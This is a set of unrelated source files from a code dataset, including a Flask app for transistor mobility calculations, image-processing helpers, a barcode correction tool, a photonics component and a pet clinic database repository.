pd.concat([drainVoltage,\n drainCurrent,\n gateVoltage,\n gateCurrent], axis=1)\n\n df2 = df2[new_columns]\n\n return render_template('for-ngraph/for-ngraph.html',\n title=title,\n originalData=data,\n transformedData=df2.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('for_ngraph'))\n\n\n# end for-ngraph page\n####################\n\n\n####################\n# linear-saturation page\n\n\n@app.route('/linear-saturation', methods=['GET', 'POST'])\ndef 
linear_saturation():\n return render_template('linear-saturation/linear-saturation.html',\n title='Linear and saturation')\n\n\n@app.route('/linear-saturation/transformed', methods=['GET', 'POST'])\ndef linear_saturation_transform():\n title = \"Data is transformed!\"\n try:\n data = request.form['textarea'] # データを取得\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n df2 = group_linear_saturation(df)\n\n return render_template('linear-saturation/linear-saturation.html',\n title=title,\n originalData=data,\n transformedData=df2.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('linear_saturation'))\n\n\n# end linear-saturation page\n####################\n\n\n####################\n# curr-vol page\n\n\n@app.route('/current-voltage', methods=['GET', 'POST'])\ndef current_voltage():\n return render_template('current-voltage/current-voltage.html',\n title='Current-voltage')\n\n\n@app.route('/current-voltage/plotted', methods=['GET', 'POST'])\ndef current_voltage_plotted():\n mpl.rcParams['font.size'] = 24\n mpl.rcParams['xtick.labelsize'] = 'large'\n mpl.rcParams['ytick.labelsize'] = 'large'\n mpl.rcParams['axes.labelsize'] = 'x-large'\n mpl.rcParams['font.family'] = 'sans-serif'\n\n try:\n data = request.form['textarea'] # データを取得\n NestedList = toNestedList(data)\n while(True):\n if NestedList[-1] == ['']:\n NestedList.pop(-1)\n else:\n break\n\n try:\n df = pd.DataFrame(NestedList[1:],\n columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:],\n columns=NestedList[0])\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = group_ngraph(df)\n\n X = drainVoltage.values\n Y = drainCurrent.values\n\n colors = [\"#4C72B0\",\n \"#55A868\",\n \"#C44E52\",\n \"#8172B2\",\n \"#CCB974\",\n \"#64B5CD\"]*5\n\n fig, ax = plt.subplots(figsize=(8, 8))\n\n for i in range(gateVoltage.values.shape[1]):\n ax.plot(X[:, i],\n Y[:, i]*1e6,\n color=colors[i])\n\n plugins.connect(fig, plugins.MousePosition(fontsize=14))\n\n def form(string):\n return request.form[string]\n\n def IsNone(string):\n return form(string) is not ''\n\n if IsNone('xaxis-min') and IsNone('xaxis-max'):\n ax.set_xlim([float(form('xaxis-min')),\n float(form('xaxis-max'))])\n\n if IsNone('yaxis-min') and IsNone('yaxis-max'):\n ax.set_ylim([float(form('yaxis-min')),\n float(form('yaxis-max'))])\n\n ax.set_xlabel(\n 'Drain-source voltage (V)')\n ax.set_ylabel(\n 'Drain-source current (µA)')\n plt.tight_layout()\n\n mpld3.save_html(fig, 'static/images/I-V.html')\n return redirect('static/images/I-V.html')\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('current_voltage'))\n\n# end curr-vol page\n####################\n\n\n####################\n# linear-mobility page\n\n\n@app.route('/linear-mobility', methods=['GET', 'POST'])\ndef linear_mobility():\n return render_template('linear-mobility/linear-mobility.html',\n title='Linear mobility')\n\n\n@app.route('/linear-mobility/calculated', methods=['GET', 'POST'])\ndef linear_mobility_calculated():\n title = \"Mobility is calculated!\"\n try:\n data = request.form['textarea']\n length = float(request.form['channel-length'])\n width = float(request.form['channel-width'])\n capacitance = float(request.form['capacitance']) # データを取得\n\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df 
= pd.DataFrame(NestedList[1:], columns=NestedList[0])\n\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = group_ngraph(df)\n\n A = []\n B = []\n\n X = gateVoltage.values\n Y = drainCurrent.values\n\n for i in range(X.shape[0]):\n x = X[i, :]\n y = Y[i, :]\n param = np.polyfit(x, y, 1)\n A.append(param[0])\n B.append(param[1])\n\n A = np.array(A)\n B = np.array(B)\n\n mu = [linear_mu(length, a, width, capacitance, v)\n for a, v in zip(A, drainVoltage.values[:, 1])]\n\n threshold = [linear_threshold(length, b, width, m, capacitance, v)\n for b, m, v in zip(B, mu, drainVoltage.values[:, 1])]\n\n table = pd.DataFrame({'drain_vol [V]': drainVoltage.values[:, 1],\n 'a [micro A/V]': A*10**6,\n 'b [micro A]': B*10**6,\n 'mu [cm^2/Vs]': mu,\n 'Vth [V]': threshold},\n columns=['drain_vol [V]',\n 'a [micro A/V]',\n 'b [micro A]',\n 'mu [cm^2/Vs]',\n 'Vth [V]'])\n\n return render_template('linear-mobility/linear-mobility.html',\n title=title,\n originalData=data,\n channelLength=length,\n channelWidth=width,\n capacitance=capacitance,\n calculatedData=table.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('linear_mobility'))\n\n# end linear-mobility page\n####################\n\n\n####################\n# saturation-mobility page\n\n\n@app.route('/saturation-mobility', methods=['GET', 'POST'])\ndef saturation_mobility():\n return render_template('saturation-mobility/saturation-mobility.html',\n title='Saturation mobility')\n\n\n@app.route('/saturation-mobility/calculated', methods=['GET', 'POST'])\ndef saturation_mobility_calculated():\n title = \"Mobility is calculated!\"\n try:\n data = request.form['textarea']\n length = float(request.form['channel-length'])\n width = float(request.form['channel-width'])\n capacitance = float(request.form['capacitance']) # データを取得\n\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = group_ngraph(df)\n\n A = []\n B = []\n C = []\n\n X = gateVoltage.values\n Y = drainCurrent.values\n\n for i in range(X.shape[0]):\n x = X[i, :]\n y = Y[i, :]\n param = np.polyfit(x, y, 2)\n A.append(param[0])\n B.append(param[1])\n C.append(param[2])\n\n A = np.array(A)\n B = np.array(B)\n C = np.array(C)\n\n mu = [saturation_mu(a, length, width, capacitance) for a in A]\n\n threshold = [saturation_threshold(b, length, width, m, capacitance)\n for b, m in zip(B, mu)]\n\n table = pd.DataFrame({'drain_vol [V]': drainVoltage.values[:, 1],\n 'a [x10^6]': A*10**6,\n 'b [x10^6]': B*10**6,\n 'c [x10^6]': C*10**6,\n 'mu [cm^2/Vs]': mu,\n 'Vth [V]': threshold},\n columns=['drain_vol [V]',\n 'a [x10^6]',\n 'b [x10^6]',\n 'c [x10^6]',\n 'mu [cm^2/Vs]',\n 'Vth [V]'])\n\n return render_template('saturation-mobility/saturation-mobility.html',\n title=title,\n originalData=data,\n channelLength=length,\n channelWidth=width,\n capacitance=capacitance,\n calculatedData=table.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('linear_mobility'))\n\n# end saturation-mobility page\n####################\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"507001498","text":"from .improve import *\nfrom .loggingfunctions 
import *\nfrom logging import getLogger\nimport badgecheck\nimport util.state\n\nlogger = getLogger(__name__)\nspecial_badges = [17800, 15098, 15097, 15099]\nspecialMSG = \"{} is allowed to receive food regardless of meeting requirements.\"\n\n\ndef addResponseMessage(resp, message):\n\tif 'message' not in resp['result']:\n\t\tresp['result']['message'] = str(message)\n\telse:\n\t\tresp['result']['message'] += \" \" +str(message)\n\n\ndef specialBadgeCheck(resp):\n\tif resp['result']['badge_num'] in special_badges:\n\t\taddResponseMessage(\n\t\t\tresp,\n\t\t\tspecialMSG.format(resp['result']['name'])\n\t\t)\n","sub_path":"backend/util/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589743294","text":"# Given an unsorted integer array, find the smallest missing positive integer.\n#\n# Example 1:\n#\n#\n# Input: [1,2,0]\n# Output: 3\n#\n#\n# Example 2:\n#\n#\n# Input: [3,4,-1,1]\n# Output: 2\n#\n#\n# Example 3:\n#\n#\n# Input: [7,8,9,11,12]\n# Output: 1\n#\n#\n# Note:\n#\n# Your algorithm should run in O(n) time and uses constant extra space.\n#\n\n\nclass Solution:\n def firstMissingPositive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n for i in range(n):\n while(0 < nums[i] <= n and nums[nums[i]-1] != nums[i]):\n ind = nums[i] - 1\n nums[i], nums[ind] = nums[ind], nums[i]\n print(nums)\n for i in range(n):\n if i != nums[i] - 1: # First wrong position\n return i + 1 \n \n return n + 1\n","sub_path":"041-first-missing-positive/first-missing-positive.py","file_name":"first-missing-positive.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491388848","text":"import urllib.parse, urllib.request, requests, json\n\ndef get(url, args, headers={}):\n if args and len(args) != 0:\n url = url + '?' 
+ urllib.parse.urlencode(args)\n\n # If you do not pass the data argument, urllib uses a GET request.\n req = urllib.request.Request(url, None, headers)\n response = urllib.request.urlopen(req)\n\n return response\n\ndef post(url, query_args={}, headers={}, type='form'):\n if type == 'json':\n data = json.dumps(query_args).encode('utf-8')\n headers['Content-Type'] = 'application/json'\n else:\n data = urllib.parse.urlencode(query_args).encode('utf-8')\n\n req = urllib.request.Request(url, data, headers)\n response = urllib.request.urlopen(req)\n # print(response.read())\n\n return response\n\ndef post_file(url, content, parameter_name, file_name, headers={}):\n files = {parameter_name: (file_name, content)}\n return requests.post(url, data={}, files=files, headers=headers)\n\ndef get_client_ip(http_x_forwarded_for, remote_addr):\n x_forwarded_for = http_x_forwarded_for\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = remote_addr\n return ip\n\ndef load_image_binary(url):\n response = get(url, {}, {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'\n })\n # https://stackoverflow.com/questions/1308584/is-it-possible-to-peek-at-the-data-in-a-urllib2-response\n # response.read = lambda: picBinary\n return response\n","sub_path":"skyvarietyutils/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"207997833","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 16:39:39 2018\n\n@author: Manuel Andres Sanchez Muñoz\n\nFunciones\n\n\"\"\"\nimport numpy as np\nimport scipy.signal as sg\nimport math\n\ndef my_gamma(image,gamma):\n Im_ga = np.double(image)\n Im2 = Im_ga**gamma #gamma image\n Im2 = np.uint8(255*Im2/Im2.max())\n return Im2\n\ndef grayWhite(image, A, B):\n imageArray = np.array(image)\n zeroArray = np.zeros(imageArray.shape)\n zeroArray[(imageArray>=A)&(imageArray<=B)] = 255\n returnImage = np.uint8(zeroArray) \n return returnImage\n\ndef grayBlack(image, A, B):\n imageArray = np.array(image)\n imageArray[(imageArray>=A)&(imageArray<=B)] = 255 \n returnImage = np.uint8(imageArray) \n return returnImage\n\ndef my_hist(im):\n [row, col] = im.shape;\n vec = np.zeros(256)\n print(vec.shape)\n for i in range(0,row-1):\n for j in range(0,col-1):\n valor = im[i,j] \n vec[valor] = vec[valor] + 1\n return vec\n\ndef my_equal(im,h):\n [row, col] = im.shape;\n n = row*col\n p = h/n\n s = np.cumsum(p)\n k = s*255\n im2=im\n for i in range(0,row-1):\n for j in range(0,col-1):\n valor = im[i,j] \n im2[i,j]=k[valor]\n return im2\n\ndef rgb2ycbcr(im):\n xform = np.array([[.299, .587, .114], [-.169, -.331, .5], [.5, -.419, -.081]])\n ycbcr = im.dot(xform.T)\n ycbcr[:,:,[1,2]] += 128\n return np.double(ycbcr)\n\ndef ycbcr2rgb(im):\n xform = np.array([[1, 0, 1.403], [1, -0.344, -.714], [1, 1.773, 0]])\n rgb = im.astype(np.float)\n rgb[:,:,[1,2]] -= 128\n rgb = rgb.dot(xform.T)\n np.putmask(rgb, rgb > 255, 255)\n np.putmask(rgb, rgb < 0, 0)\n return np.uint8(rgb)\n\ndef my_linealTrozos(image,a,p1,p2):\n Im_lt = np.double(image)\n Im_s = np.zeros(Im_lt.shape)\n Im_s[Im_lt<=p1[0]]=a[0]*Im_lt[Im_lt<=p1[0]]\n 
Im_s[(Im_lt>p1[0])&(Im_lt<=p2[0])]=a[1]*(Im_lt[(Im_lt>p1[0])&(Im_lt<=p2[0])]-p1[0])+p1[1]\n Im_s[Im_lt>p2[0]]=a[2]*(Im_lt[Im_lt>p2[0]]-p2[0])+p2[1]\n Imf = np.uint8(Im_s)\n return Imf\n\ndef logarithm(image):\n imageDouble = np.double(np.array(image))\n imageReturn = np.log(1+imageDouble)\n imageReturn = np.uint8(255*imageReturn/imageReturn.max())\n return imageReturn\n\ndef negative(image):\n imageReturn = np.array(image)\n imageSend = 255 - imageReturn\n return imageSend\n\n# Funciones para parcial 2\n\ndef my_mse(image1,image2):\n [n,l] = image1.shape\n n = n * l\n mse = sum(sum((image1-image2)**2))/n\n return mse\n\ndef my_medianfilter(im):\n [row,col]=im.shape\n imf = np.zeros((row+2,col+2))\n i_median = np.zeros((row,col))\n imf[1:row+1,1:col+1] = im\n for i in range (1,row):\n for j in range (1,col):\n temp = imf[i-1:i+1:,j-1:j+1]\n out = np.median(temp)\n i_median[i-1,j-1] = out\n return i_median\n\ndef my_gradient(im):\n mask_dx = np.array([(-1,-2,-1),(0,0,0),(1,2,1)])\n mask_dy = np.array([(-1,0,1),(-2,0,2),(-1,0,1)])\n Im_dx = sg.convolve2d(im,mask_dx)\n Im_dy = sg.convolve2d(im,mask_dy)\n Im_grad = np.abs(Im_dx)+np.abs(Im_dy)\n return (Im_grad, Im_dy, Im_dx)\n\ndef my_laplace_4_vecinos(im):\n mask_dx = np.array([(0,-1,0),(-1,5,-1),(0,-1,0)])\n Im_dx = sg.convolve2d(im,mask_dx)\n imageReturn = np.uint8(255*Im_dx/Im_dx.max())\n return (imageReturn)\n\ndef my_laplace_8_vecinos(im):\n mask_dx = np.array([(-1,-1,-1),(-1,9,-1),(-1,-1,-1)])\n Im_dx = sg.convolve2d(im,mask_dx)\n imageReturn = np.uint8(255*Im_dx/Im_dx.max())\n return (imageReturn)\n\ndef my_rgb2cmy(im):\n CMY = 255-im\n return CMY\n\ndef my_cmy2rgb(im):\n RGB = 255-im\n return RGB\n\ndef my_mseRGB(image1,image2):\n [m,n,b]=image1.shape\n N = m*n*b\n mse = sum(sum(sum((image1-image2)**2)))/N\n return mse\n\ndef my_threshold(image, umbral):\n Image_lt = np.double(image)\n Image_zero = np.zeros(Image_lt.shape)\n Image_zero[(Image_lt>=umbral)]=1\n imageResponse = np.uint8(Image_zero)\n return imageResponse \n\ndef rgb2hsi(r,g,b):\n numerador = (((r - g) + (r - b)) * 0.5)\n denominador = ((((r - g)*(r - g)) + ((r - b) * (g - b)))**0.5)\n \n if (denominador == 0):\n denominador = 0.000001\n \n theta = np.arccos(numerador/denominador)\n \n if(b<=g):\n h = theta\n if(b>g):\n h = (2*np.degrees(math.pi)) - theta\n \n s = 1 - ((3*min(r,g,b))/float(r + b + g))\n \n if (s==0):\n h=0\n \n i = float(r + g + b)/3\n return (h, s, i)\n\ndef hsi2rgb (H,S,I):\n r=0\n g=0\n b=0\n \n if (H>=0 and H<((2*np.degrees(math.pi))/3)):\n b = I*(1-S)\n den = np.cos((math.pi/3)-H)\n \n if (den == 0):\n den=0.000001\n \n r = I*(1+((S*np.cos(H))/den))\n g = (3*I)-(r+b)\n \n if (H>=((2*np.degrees(math.pi))/3) and H<(4*((np.degrees(math.pi))/3))):\n r = I*(1-S)\n den = (np.cos(((math.pi)/3)-(H-((math.pi)/3))))\n \n if (den == 0):\n den=0.000001\n \n g = I*(1+((S*np.cos(H-(math.pi/3))))/den)\n b = (3*I)-(r+g)\n \n if (H>=(4*((np.degrees(math.pi))/3)) and H<(2*np.degrees(math.pi))):\n g = I*(1-S)\n den = (np.cos(((math.pi)/3)-(H-(4*((math.pi)/3)))))\n \n if (den == 0):\n den=0.000001\n \n b = I*(1+((S*np.cos(H-(4*((math.pi)/3))))/den))\n r = (3*I)-(g+b)\n \n return (r,g,b)\n \n \n \n \n\n \n \n \n \n \n \n \n \n\n\n\n","sub_path":"paraParcial2/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"233194968","text":"import editdistance\nfrom tqdm import tqdm\nfrom typing import Optional, Dict\nimport nmslib\nimport pandas as 
pd\n\n\nclass SeqCorrect:\n def __init__(\n self,\n min_counts: int = 20,\n max_dist: int = 3,\n ann_k: Optional[int] = None,\n ann_m: int = 30,\n ann_ef_construction: int = 100,\n ann_post: int = 0,\n n_threads: int = 2,\n ann_ef_search: int = 100,\n disable_progress_bar: bool = False,\n ):\n \"\"\"\n Class for identifying erroneous barcodes and merging their frequency with their correct version.\n\n :param min_counts: Minimum barcode frequency threshold. Barcodes with less than this value are removed. This\n check is performed on corrected counts.\n :param max_dist: Minimum distance threshold when comparing barcodes. Barcodes with less than this value is\n considered to be an erroneous version of a higher abundance barcode.\n :param ann_k: Number of neighbours in the KNN search.\n :param ann_m: ANN index construction parameter M\n :param ann_ef_construction: ANN index construction EF\n :param ann_post: ANN index construction post\n :param n_threads: ANN number of threads\n :param ann_ef_search: ANN query parameter EF\n :param disable_progress_bar: If True, then progress bars are not shown\n \"\"\"\n\n if ann_k is None:\n self.annK = 2 * ann_m # Same as the default behaviour of nmslib\n else:\n self.annK = ann_k\n self.minCounts = min_counts\n self.maxDist = max_dist\n self.indexParams = {\n \"M\": ann_m,\n \"efConstruction\": ann_ef_construction,\n \"post\": ann_post,\n \"indexThreadQty\": n_threads,\n }\n self.queryParams = {\"efSearch\": ann_ef_search}\n self.index = None\n self.correctedCounts: Optional[pd.Series] = None\n self.disablePb = disable_progress_bar\n\n def _build_index(self, raw_counts: Dict[str, int]) -> None:\n index = nmslib.init(\n method=\"hnsw\",\n space=\"leven\",\n data_type=nmslib.DataType.OBJECT_AS_STRING,\n dtype=nmslib.DistType.INT,\n )\n index.addDataPointBatch(list(raw_counts.keys()))\n index.createIndex(self.indexParams, print_progress=True)\n self.index = index\n\n def _query_index(self, raw_counts: Dict[str, int]) -> Dict[str, str]:\n bc_list = list(raw_counts.keys())\n self.index.setQueryTimeParams(self.queryParams)\n nbrs = self.index.knnQueryBatch(\n bc_list, k=self.annK, num_threads=self.indexParams[\"indexThreadQty\"]\n )\n nm = {}\n for n, i in tqdm(\n enumerate(nbrs),\n total=len(nbrs),\n desc=\"Querying ANN index\",\n disable=self.disablePb,\n ):\n a = bc_list[n]\n for j in i[0]:\n b = bc_list[j]\n if j == n:\n continue\n if raw_counts[a] > raw_counts[b]:\n continue\n d = editdistance.eval(a, b)\n if d > self.maxDist:\n break\n if a in nm:\n if raw_counts[b] > raw_counts[nm[a]]:\n nm[a] = b\n else:\n nm[a] = b\n return nm\n\n def _correct(\n self, raw_counts: Dict[str, int], neighbors: Dict[str, str]\n ) -> Dict[str, int]:\n bc_list = list(raw_counts.keys())\n cor_counts = {}\n for i in tqdm(bc_list, desc=\"Merging barcodes\", disable=self.disablePb):\n if i in neighbors:\n a = neighbors[i]\n else:\n a = i\n if a not in cor_counts:\n cor_counts[a] = 0\n cor_counts[a] += raw_counts[i]\n\n clean_counts = {}\n for i in tqdm(\n cor_counts, desc=\"Filtering corrected barcodes\", disable=self.disablePb\n ):\n if raw_counts[i] <= cor_counts[i] and cor_counts[i] > self.minCounts:\n clean_counts[i] = cor_counts[i]\n return clean_counts\n\n def run(self, raw_counts: pd.Series) -> None:\n \"\"\"\n Get corrected and filtered barcodes.\n\n :param raw_counts: Row barcodes counts, in form of a dictionary.\n :return: Corrected barcode counts in form of a dictionary\n \"\"\"\n counts = dict(raw_counts.to_dict())\n self._build_index(counts)\n neighbors = 
self._query_index(counts)\n self.correctedCounts = pd.Series(self._correct(counts, neighbors))\n\n def save_to_csv(self, file_name: str):\n \"\"\"\n\n :param file_name:\n :return:\n \"\"\"\n self.correctedCounts.to_csv(file_name, header=False)\n","sub_path":"bartide/sequence_corrector.py","file_name":"sequence_corrector.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"97326866","text":"#!/usr/bin/env python3\n\"\"\"\nClass defines a single neuron performing binary classification\n\"\"\"\nimport numpy as np\n\n\nclass DeepNeuralNetwork:\n \"\"\" class neuron\"\"\"\n def __init__(self, nx, layers):\n \"\"\" initialize \"\"\"\n # nx is the number of input features\n if not isinstance(nx, int):\n raise TypeError(\"nx must be an integer\")\n elif nx < 1:\n raise ValueError(\"nx must be a positive integer\")\n\n # is the number of layers found in the hidden layer\n if not isinstance(layers, int):\n raise TypeError(\"layers must be an integer\")\n elif layers < 1:\n raise ValueError(\"layers must be a positive integer\")\n","sub_path":"supervised_learning/0x00-binary_classification/19-deep_neural_network.py","file_name":"19-deep_neural_network.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"266711342","text":"import gdsfactory as gf\nfrom gdsfactory.add_padding import get_padding_points\nfrom gdsfactory.component import Component\nfrom gdsfactory.cross_section import strip\nfrom gdsfactory.path import arc, extrude\nfrom gdsfactory.snap import snap_to_grid\nfrom gdsfactory.types import CrossSectionFactory\n\n\n@gf.cell\ndef bend_circular(\n angle: int = 90,\n npoints: int = 720,\n with_cladding_box: bool = True,\n cross_section: CrossSectionFactory = strip,\n **kwargs\n) -> Component:\n \"\"\"Returns a radial arc.\n\n Args:\n angle: angle of arc (degrees)\n npoints: number of points\n with_cladding_box: square in layers_cladding to remove DRC\n cross_section:\n **kwargs: cross_section settings\n\n .. 
plot::\n :include-source:\n\n import gdsfactory as gf\n\n c = gf.components.bend_circular(radius=10, angle=90, npoints=720)\n c.plot()\n\n \"\"\"\n x = cross_section(**kwargs)\n radius = x.info[\"radius\"]\n\n p = arc(radius=radius, angle=angle, npoints=npoints)\n c = extrude(p, x)\n\n c.length = snap_to_grid(p.length())\n c.dy = abs(p.points[0][0] - p.points[-1][0])\n c.radius_min = radius\n\n if with_cladding_box and x.info[\"layers_cladding\"]:\n layers_cladding = x.info[\"layers_cladding\"]\n cladding_offset = x.info[\"cladding_offset\"]\n top = cladding_offset if angle == 180 else 0\n points = get_padding_points(\n component=c,\n default=0,\n bottom=cladding_offset,\n right=cladding_offset,\n top=top,\n )\n for layer in layers_cladding or []:\n c.add_polygon(points, layer=layer)\n return c\n\n\n@gf.cell\ndef bend_circular180(angle: int = 180, **kwargs) -> Component:\n \"\"\"Returns a 180 degrees radial arc.\n\n Args:\n angle: angle of arc (degrees)\n npoints: number of points\n with_cladding_box: square in layers_cladding to remove DRC\n waveguide: from tech.waveguide\n kwargs: cross_section_factory settings\n\n \"\"\"\n return bend_circular(angle=angle, **kwargs)\n\n\nif __name__ == \"__main__\":\n from pprint import pprint\n\n # c = bend_circular(width=2, layer=gf.LAYER.M1)\n c = bend_circular()\n c.show()\n pprint(c.get_settings())\n\n # c = bend_circular180()\n # c.plotqt()\n\n # from phidl.quickplotter import quickplot2\n # c = bend_circular_trenches()\n # c = bend_circular_deep_rib()\n # print(c.ports)\n # print(c.length, np.pi * 10)\n # print(c.ports.keys())\n # print(c.ports['o2'].midpoint)\n # print(c.settings)\n # c = bend_circular_slot()\n # c = bend_circular(width=0.45, radius=5)\n # c.plot()\n # quickplot2(c)\n","sub_path":"gdsfactory/components/bend_circular.py","file_name":"bend_circular.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561211483","text":"# Import required modules\nfrom database.run_sql import run_sql\nfrom models.pet import Pet\nfrom models.owner import Owner\nfrom models.pet_type import PetType\nfrom models.vet import Vet\nimport repositories.pet_type_repository as PTR\nimport repositories.owner_repository as OR\nimport repositories.vet_repository as VR\n\n# CRUD FUNCTIONS\n\n# FUNCTION: save(item)\n# This function is used to save a pet to the database\ndef save(pet):\n # Create the SQL query && input data before running it\n sql = \"INSERT INTO pet (name, dob, owner_id, type_id, vet_id) VALUES (%s, %s, %s, %s, %s) RETURNING id\"\n values = [pet.name, pet.dob, pet.owner.id, pet.pet_type.id, pet.vet.id]\n result = run_sql(sql, values)\n\n # Set the pet objects ID to the ID generated by the database\n if len(result) > 0:\n id = result[0]['id']\n pet.id = id\n\n return pet\n\n# FUNCTION: select_all()\n# This function is used to select all of the pets from the database and create python objects\n# using the data so they can be displayed\ndef select_all():\n # Create list of pet objects and set == empty list\n pets = []\n\n # Create the SQL query && input data before running it\n sql = \"SELECT * FROM pet\"\n results = run_sql(sql)\n\n # Loop through all the results and append the objects to a list\n for row in results:\n # Get the objects to create the pet object\n pet_type = PTR.select(row['type_id'])\n owner = OR.select(row['owner_id'])\n vet = VR.select(row['vet_id'])\n\n # Create new pet object && append to pets list\n new_pet = Pet(row['name'], 
row['dob'], owner, pet_type, vet, row['id'])\n pets.append(new_pet)\n\n return pets\n\n# FUNCTION: select(item_id)\n# This function is used to select a specific pet by its ID in the database to be able to create an object\n# that can be displayed\ndef select(pet_id):\n # Create the SQL query, pass in the data and run it\n sql = \"SELECT * FROM pet WHERE id = %s\"\n values = [pet_id]\n result = run_sql(sql, values)\n\n # Create object if data is found in the database\n if len(result) > 0:\n pet_type = PTR.select(result[0]['type_id'])\n owner = OR.select(result[0]['owner_id'])\n vet = VR.select(result[0]['vet_id'])\n new_pet = Pet(result[0]['name'], result[0]['dob'], owner, pet_type, vet, result[0]['id'])\n \n return new_pet\n\n# FUNCTION: delete(item_id)\n# This function is used to delete a specific item from the database using its id\ndef delete(pet_id):\n # Create the SQL query, pass in the data and run it\n sql = \"DELETE FROM pet WHERE id = %s\"\n values = [pet_id]\n run_sql(sql, values)\n\n# FUNCTION: delete_all()\n# This function is used to delete all data from the table that coresponds to the class it is run from\ndef delete_all():\n # Create SQL query and run it\n sql = \"DELETE FROM pet\"\n run_sql(sql)\n\n# FUNCTION: update(item_id)\n# This function is used to update data within the database\ndef update(pet):\n # Create SQL query, pass in the data and run it\n sql = \"UPDATE pet SET (name, dob, owner_id, type_id, vet_id) = (%s, %s, %s, %s, %s) WHERE id = %s\"\n values = [pet.name, pet.dob, pet.owner.id, pet.pet_type.id, pet.vet.id, pet.id]\n run_sql(sql, values)\n\n# FUNCTION: select_by_owner(item_id)\n# This function is used to select all pets by an owner id\ndef select_by_owner(owner_id):\n # Create list of pets == empty list\n pets = []\n\n # Create SQL query, input data && run\n sql = \"SELECT * FROM pet WHERE owner_id = %s\"\n values = [owner_id]\n results = run_sql(sql, values)\n\n # Loop through the results\n for row in results:\n # Get the objects to create the pet object\n pet_type = PTR.select(row['type_id'])\n owner = OR.select(row['owner_id'])\n vet = VR.select(row['vet_id'])\n\n # Create new pet object && append to pets list\n new_pet = Pet(row['name'], row['dob'], owner, pet_type, vet, row['id'])\n pets.append(new_pet)\n\n return pets\n\n# FUNCTION: select_by_vet(item_id)\n# This function is used to select all pets by the vet id\ndef select_by_vet(vet_id):\n # Create list of pets == empty list\n pets = []\n\n # Create SQL query, input data && run\n sql = \"SELECT * FROM pet WHERE vet_id = %s\"\n values = [vet_id]\n results = run_sql(sql, values)\n\n # Loop through the results\n for row in results:\n # Get the objects to create the pet object\n pet_type = PTR.select(row['type_id'])\n owner = OR.select(row['owner_id'])\n vet = VR.select(row['vet_id'])\n\n # Create new pet object && append to pets list\n new_pet = Pet(row['name'], row['dob'], owner, pet_type, vet, row['id'])\n pets.append(new_pet)\n\n return pets","sub_path":"app/repositories/pet_repository.py","file_name":"pet_repository.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"384703344","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(-np.pi, np.pi, 256, endpoint = True)\nC, S = np.cos(x), np.sin(x)\n\n\n\n\n\n\nplt.figure(figsize = (8,6), dpi = 100)\nplt.subplot(111)\nx = np.linspace(-np.pi, np.pi, 256, endpoint = True)\nC, S = np.cos(x), np.sin(x)\nplt.plot(x, C, color = 'blue', 
